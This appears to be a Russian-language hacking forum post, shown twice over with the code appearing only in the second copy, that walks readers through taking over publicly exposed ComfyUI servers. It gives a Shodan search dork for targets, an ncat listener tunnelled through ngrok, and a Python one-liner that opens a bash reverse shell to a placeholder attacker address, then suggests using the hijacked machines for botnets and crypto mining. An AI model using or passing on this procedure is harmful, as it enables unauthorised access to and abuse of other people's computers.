Download_Link
Участник клуба
Здарова! Я вам шалость принес — гайд по взлому компьютеров с ComfyUI (вкратце, это программа с открытым исходным кодом) через Shodan.
Все делается настолько просто и легко, что это поймет даже вонючий школьник, однако во избежание растяжение ануса читаем подобные маники строго в ознакомительных целях.
1. Двигаем на shodan.io и регистрируемся там;
2. Вбиваем дорк (автор уверяет, что отсеял в нем невалидные ханипоты и китайское дерьмо, вместе с амазоновскими тачками, которые не работают):
3. После этого видим первый попавшийся запрос. Кликаем на него и переходим в интерфейс ComfyUI. После перехода по ссылке нажимаем на шестиренку и попадаем в настройки, а затем клацаем на кнопку «О программе». Мы попадем в меню с информацией о системе;
└ Если написано nt — то это Windows. А вот если увидели posix — то значит это Linux ;
4. Ставим необходимые тулзы. Нам нужен ncat, а чтобы юзнуть его — нужно поставить nmap на нашу систему. После этого ставим ngrok с официальной страницы
5. После установки всего этого чуда открываем PowerShell и пишем это:
Открываем еще одно окно консоли и включаем ngrok чтобы он слушал наш порт по tcp:
Получаем ссылку такого вида: tcp://8.tcp.us.ngrok.io:1337. Нам нужна часть после tcp. Заполняем эту команду своими данными и сохраняем куда-нибудь:
6. Возвращаемся обратно к нашему ComfyUI, заходим в вкладку менеджера (он должен быть установлен!), ищем ноду SRL и ставим ее;
7. Запускаем флоу и получаем реверсшелл прямо на свою тачку. Быстро и без регистрации. В-С-Ё!
А уже с этим добром делаем, что хотим — создаем ботнеты (), майним крипту () ну или просто юзаем для своих целей.
Все делается настолько просто и легко, что это поймет даже вонючий школьник, однако во избежание растяжение ануса читаем подобные маники строго в ознакомительных целях.
1. Двигаем на shodan.io и регистрируемся там;
2. Вбиваем дорк (автор уверяет, что отсеял в нем невалидные ханипоты и китайское дерьмо, вместе с амазоновскими тачками, которые не работают):
Код:
https://www.shodan.io/search?query=http.title:"ComfyUI"+-http.title:"ComfyUI+Login"+-org:"Amazon.com+Inc."+-org:"Amazon+Data+Services"+-org:"Amazon+Technologies"+-org:"A100+ROW"+-org:"Amazon+Corporate+Services+Pty+Ltd"+-org:"AWS+Asia+Pacific+(Seoul)+Region"+-http.favicon.hash:1045696447+-http.favicon.hash:1592926977+-http.favicon.hash:2091717113+-http.favicon.hash:1924358485+-http.favicon.hash:1750461220+-http.favicon.hash:939607277+-http.favicon.hash:1750461220+-http.favicon.hash:-1439222863+-http.favicon.hash:-1750461220+-http.favicon.hash:444712798+"Python"+"aiohttp"+"Expires"+-country:"CN"└ Если написано nt — то это Windows. А вот если увидели posix — то значит это Linux ;
4. Ставим необходимые тулзы. Нам нужен ncat, а чтобы юзнуть его — нужно поставить nmap на нашу систему. После этого ставим ngrok с официальной страницы
5. После установки всего этого чуда открываем PowerShell и пишем это:
ncat -n -v -l -p 444Открываем еще одно окно консоли и включаем ngrok чтобы он слушал наш порт по tcp:
ngrok tcp 444Получаем ссылку такого вида: tcp://8.tcp.us.ngrok.io:1337. Нам нужна часть после tcp. Заполняем эту команду своими данными и сохраняем куда-нибудь:
__import__('os').system('bash -c "bash -i >& /dev/tcp/YOUR_NGROK_IP/YOUR_NGROK_PORT 0>&1"')6. Возвращаемся обратно к нашему ComfyUI, заходим в вкладку менеджера (он должен быть установлен!), ищем ноду SRL и ставим ее;
7. Запускаем флоу и получаем реверсшелл прямо на свою тачку. Быстро и без регистрации. В-С-Ё!
А уже с этим добром делаем, что хотим — создаем ботнеты (), майним крипту () ну или просто юзаем для своих целей.
